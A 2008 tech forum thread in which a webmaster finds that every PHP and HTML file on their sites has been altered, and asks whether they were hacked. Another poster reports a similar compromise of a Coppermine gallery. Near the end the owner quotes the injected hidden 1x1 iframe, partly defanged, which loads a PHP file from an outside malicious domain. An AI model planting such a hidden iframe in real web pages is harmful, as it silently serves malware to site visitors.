what is cdpuvbhfzz.com?

  grumpy-git 18:17 06 Apr 2008
Locked

I've got some web sites & phpbb forums, but checking via ftp some files seem to have been updated this evening at 17.47.


Seems something is trying to be downloaded from the above address when accessing my phpbb forum and various web sites.

Has a hacker been busy?

  anskyber 18:21 06 Apr 2008

The only reference. click here

  Cockney Rebel 18:24 06 Apr 2008

Just had a swift google and only able to find this
click here

  Cockney Rebel 18:25 06 Apr 2008

sorry anskyber hadn,t realised you'd found the same one.

  grumpy-git 18:38 06 Apr 2008

Thanks for that.

Looking further into it, seems like just about all my php files & html files have been updated at that time.

Nobody else has access to my web space, is this the result of a hacker accessing my web space or hacking my host's server?

  grumpy-git 18:49 06 Apr 2008

I've noticed that my html pages have little dots at the top & the bottom, which shouldn't be there.

Confused!

  grumpy-git 19:20 06 Apr 2008

Me agai. Just looked at the source html of one of the pages & it has an iframe added.

Never come across them before, but that must be to blame, but how did it get on all the pages??

  grumpy-git 19:41 06 Apr 2008

Just phoning my web host - to see if the problem has come from their server.

  grumpy-git 19:44 06 Apr 2008

The host is investigating, all I can do now is wait for an e-mail reply.

  richw2k2 23:12 06 Apr 2008

Not sure if this will help anyone.
I noticed the same little dots on my php-nuke based site with iframes appearing in the source code. There is post on the coppermine forum which is the same as this. I upgraded coppermine a few weeks ago and have been running it with some plugins (rss and a Jscript upload function) dont know if these are to blame but my gallery does not work, all the files in the gallery folder have been modified at the same time. The gallery does not work and i get the message

Parse error: syntax error, unexpected '<' in .../gallery/plugins/jupload/codebase.php on line 171
For now i am reinstalling coppermine and hope that solves the problem

  grumpy-git 23:24 06 Apr 2008

I'm nowhere near solving my problem. Here is the iframe code, if anybody can work out what it means

< src="http://cdpuvbhfzz.com/dl/adv598.php" width=1 height=1></>

As a precaution, I have removed iframe from the beginning & end.

I have also changed the access password to my webspace

This thread is now locked and can not be replied to.

Elsewhere on IDG sites

WPA2 Hack Latest News: How Secure is your Wi-Fi?

Photoshop CC 2018 released with new Curvature Pen and better brush tools

Best kids apps for iPhone & iPad

Comment utiliser Twitter ?